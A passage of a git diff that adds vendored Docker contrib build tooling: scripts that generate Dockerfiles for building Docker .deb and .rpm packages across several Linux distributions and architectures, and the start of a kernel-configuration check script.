a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh new file mode 100755 index 0000000000..0e20b9c4b5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh @@ -0,0 +1,103 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-xenial +# to only update ubuntu-xenial/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for 
version in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="ppc64le/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! + # + + FROM $from + + EOF + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + vim-common # tini dep + ) + + case "$suite" in + trusty) + packages+=( libsystemd-journal-dev ) + ;; + *) + # libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so" + packages+=( libseccomp-dev ) + packages+=( libsystemd-dev ) + ;; + esac + + # buildtags + case "$suite" in + # trusty has no seccomp package + trusty) + runcBuildTags="apparmor selinux" + ;; + # ppc64le support was backported into libseccomp 2.2.3-2, + # so enable seccomp by default + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor seccomp selinux" + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 
== "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile" + echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile new file mode 100644 index 0000000000..4182d683b0 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
+# + +FROM ppc64le/ubuntu:trusty + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..f1521db72f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
+# + +FROM ppc64le/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile new file mode 100644 index 0000000000..4f8cc66769 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
+# + +FROM ppc64le/ubuntu:yakkety + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh new file mode 100755 index 0000000000..8271d9dc47 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh new file mode 100755 index 0000000000..b8f5860844 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh @@ -0,0 +1,96 @@ +#!/bin/bash +set -e + +# This file is used to auto-generate Dockerfiles for making debs via 'make deb' +# +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in this directory +# or: ./generate.sh ubuntu-xenial +# to only update ubuntu-xenial/Dockerfile +# or: ./generate.sh ubuntu-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version 
in "${versions[@]}"; do + echo "${versions[@]}" + distro="${version%-*}" + suite="${version##*-}" + from="s390x/${distro}:${suite}" + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! + # + + FROM $from + + EOF + + extraBuildTags='pkcs11' + runcBuildTags= + + # this list is sorted alphabetically; please keep it that way + packages=( + apparmor # for apparmor_parser for testing the profile + bash-completion # for bash-completion debhelper integration + btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) + build-essential # "essential for building Debian packages" + cmake # tini dep + curl ca-certificates # for downloading Go + debhelper # for easy ".deb" building + dh-apparmor # for apparmor debhelper + dh-systemd # for systemd debhelper integration + git # for "git commit" info in "docker -v" + libapparmor-dev # for "sys/apparmor.h" + libdevmapper-dev # for "libdevmapper.h" + libltdl-dev # for pkcs11 "ltdl.h" + libseccomp-dev # for "seccomp.h" & "libseccomp.so" + libsqlite3-dev # for "sqlite3.h" + pkg-config # for detecting things like libsystemd-journal dynamically + libsystemd-dev + vim-common # tini dep + ) + + case "$suite" in + # s390x needs libseccomp 2.3.1 + xenial) + # Ubuntu Xenial has libseccomp 2.2.3 + runcBuildTags="apparmor selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="apparmor selinux seccomp" + ;; + esac + + # update and install packages + echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> 
"$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile new file mode 100644 index 0000000000..6d7e4c574b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile @@ -0,0 +1,16 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! +# + +FROM s390x/ubuntu:xenial + +RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux +ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md new file mode 100644 index 0000000000..5f2e888c7a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md @@ -0,0 +1,5 @@ +# `dockercore/builder-rpm` + +This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets. 
+ +To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh new file mode 100755 index 0000000000..558f7ee0db --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh @@ -0,0 +1,10 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +set -x +./generate.sh +for d in */; do + docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d" +done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile new file mode 100644 index 0000000000..1f841631ca --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM centos:7 + +RUN yum groupinstall -y "Development Tools" +RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs +RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile new file mode 100644 index 0000000000..af040c5c9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM fedora:24 + +RUN dnf -y upgrade +RUN dnf install -y @development-tools fedora-packager +RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile new file mode 100644 index 0000000000..98e57a9c4b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile @@ -0,0 +1,19 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! +# + +FROM fedora:25 + +RUN dnf -y upgrade +RUN dnf install -y @development-tools fedora-packager +RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh new file mode 100755 index 0000000000..6f93afafa3 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh @@ -0,0 +1,189 @@ +#!/bin/bash +set -e + +# usage: ./generate.sh [versions] +# ie: ./generate.sh +# to update all Dockerfiles in 
this directory +# or: ./generate.sh centos-7 +# to only update centos-7/Dockerfile +# or: ./generate.sh fedora-newversion +# to create a new folder and a Dockerfile within it + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +versions=( "$@" ) +if [ ${#versions[@]} -eq 0 ]; then + versions=( */ ) +fi +versions=( "${versions[@]%/}" ) + +for version in "${versions[@]}"; do + distro="${version%-*}" + suite="${version##*-}" + from="${distro}:${suite}" + installer=yum + + if [[ "$distro" == "fedora" ]]; then + installer=dnf + fi + if [[ "$distro" == "photon" ]]; then + installer=tdnf + fi + + mkdir -p "$version" + echo "$version -> FROM $from" + cat > "$version/Dockerfile" <<-EOF + # + # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! + # + + FROM $from + EOF + + echo >> "$version/Dockerfile" + + extraBuildTags='pkcs11' + runcBuildTags= + + case "$from" in + oraclelinux:6) + # We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version + # This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo + echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4" >> "$version/Dockerfile" + echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + fedora:*) + echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile" + ;; + *) ;; + esac + + case "$from" in + centos:*) + # get "Development Tools" packages dependencies + echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" + + if [[ "$version" == "centos-7" ]]; then + echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile" + fi + ;; + oraclelinux:*) + # get "Development Tools" packages and dependencies + # we also need yum-utils for yum-config-manager to pull 
the latest repo file + echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" + ;; + opensuse:*) + # get rpm-build and curl packages and dependencies + echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile" + ;; + photon:*) + echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile" + ;; + *) + echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile" + ;; + esac + + packages=( + btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible) + device-mapper-devel # for "libdevmapper.h" + glibc-static + libseccomp-devel # for "seccomp.h" & "libseccomp.so" + libselinux-devel # for "libselinux.so" + libtool-ltdl-devel # for pkcs11 "ltdl.h" + pkgconfig # for the pkg-config command + selinux-policy + selinux-policy-devel + sqlite-devel # for "sqlite3.h" + systemd-devel # for "sd-journal.h" and libraries + tar # older versions of dev-tools do not have tar + git # required for containerd and runc clone + cmake # tini build + vim-common # tini build + ) + + case "$from" in + oraclelinux:7) + # Enable the optional repository + packages=( --enablerepo=ol7_optional_latest "${packages[*]}" ) + ;; + esac + + case "$from" in + oraclelinux:6) + # doesn't use systemd, doesn't have a devel package for it + packages=( "${packages[@]/systemd-devel}" ) + ;; + esac + + # opensuse & oraclelinx:6 do not have the right libseccomp libs + case "$from" in + opensuse:*|oraclelinux:6) + packages=( "${packages[@]/libseccomp-devel}" ) + runcBuildTags="selinux" + ;; + *) + extraBuildTags+=' seccomp' + runcBuildTags="seccomp selinux" + ;; + esac + + case "$from" in + opensuse:*) + packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" ) + packages=( "${packages[@]/pkgconfig/pkg-config}" ) + packages=( "${packages[@]/vim-common/vim}" ) + if [[ "$from" 
== "opensuse:13."* ]]; then + packages+=( systemd-rpm-macros ) + fi + + # use zypper + echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile" + ;; + photon:*) + packages=( "${packages[@]/pkgconfig/pkg-config}" ) + echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" + ;; + *) + echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" + ;; + esac + + echo >> "$version/Dockerfile" + + + awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" + echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" + echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" + + echo >> "$version/Dockerfile" + + # print build tags in alphabetical order + buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) + + echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" + echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + + case "$from" in + oraclelinux:6) + # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff. + # The ordering is very important and should not be changed. 
+ echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \' >> "$version/Dockerfile" + echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include' >> "$version/Dockerfile" + echo >> "$version/Dockerfile" + ;; + *) ;; + esac + + +done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile new file mode 100644 index 0000000000..addd431508 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM opensuse:13.2 + +RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build +RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 selinux +ENV RUNC_BUILDTAGS selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile new file mode 100644 index 0000000000..c34d3046dd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile @@ -0,0 +1,28 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM oraclelinux:6 + +RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4 +RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek + +RUN yum groupinstall -y "Development Tools" +RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 selinux +ENV RUNC_BUILDTAGS selinux + +ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \ + -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile new file mode 100644 index 0000000000..378536b647 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM oraclelinux:7 + +RUN yum groupinstall -y "Development Tools" +RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile new file mode 100644 index 0000000000..b77d573d9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile @@ -0,0 +1,18 @@ +# +# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
+# + +FROM photon:1.0 + +RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils +RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common + +ENV GO_VERSION 1.7.5 +RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local +ENV PATH $PATH:/usr/local/go/bin + +ENV AUTO_GOPATH 1 + +ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux +ENV RUNC_BUILDTAGS seccomp selinux + diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh new file mode 100755 index 0000000000..d07e4ce368 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/check-config.sh @@ -0,0 +1,354 @@ +#!/usr/bin/env bash +set -e + +EXITCODE=0 + +# bits of this were adapted from lxc-checkconfig +# see also https://github.com/lxc/lxc/blob/lxc-1.0.2/src/lxc/lxc-checkconfig.in + +possibleConfigs=( + '/proc/config.gz' + "/boot/config-$(uname -r)" + "/usr/src/linux-$(uname -r)/.config" + '/usr/src/linux/.config' +) + +if [ $# -gt 0 ]; then + CONFIG="$1" +else + : ${CONFIG:="${possibleConfigs[0]}"} +fi + +if ! 
command -v zgrep &> /dev/null; then + zgrep() { + zcat "$2" | grep "$1" + } +fi + +kernelVersion="$(uname -r)" +kernelMajor="${kernelVersion%%.*}" +kernelMinor="${kernelVersion#$kernelMajor.}" +kernelMinor="${kernelMinor%%.*}" + +is_set() { + zgrep "CONFIG_$1=[y|m]" "$CONFIG" > /dev/null +} +is_set_in_kernel() { + zgrep "CONFIG_$1=y" "$CONFIG" > /dev/null +} +is_set_as_module() { + zgrep "CONFIG_$1=m" "$CONFIG" > /dev/null +} + +color() { + local codes=() + if [ "$1" = 'bold' ]; then + codes=( "${codes[@]}" '1' ) + shift + fi + if [ "$#" -gt 0 ]; then + local code= + case "$1" in + # see https://en.wikipedia.org/wiki/ANSI_escape_code#Colors + black) code=30 ;; + red) code=31 ;; + green) code=32 ;; + yellow) code=33 ;; + blue) code=34 ;; + magenta) code=35 ;; + cyan) code=36 ;; + white) code=37 ;; + esac + if [ "$code" ]; then + codes=( "${codes[@]}" "$code" ) + fi + fi + local IFS=';' + echo -en '\033['"${codes[*]}"'m' +} +wrap_color() { + text="$1" + shift + color 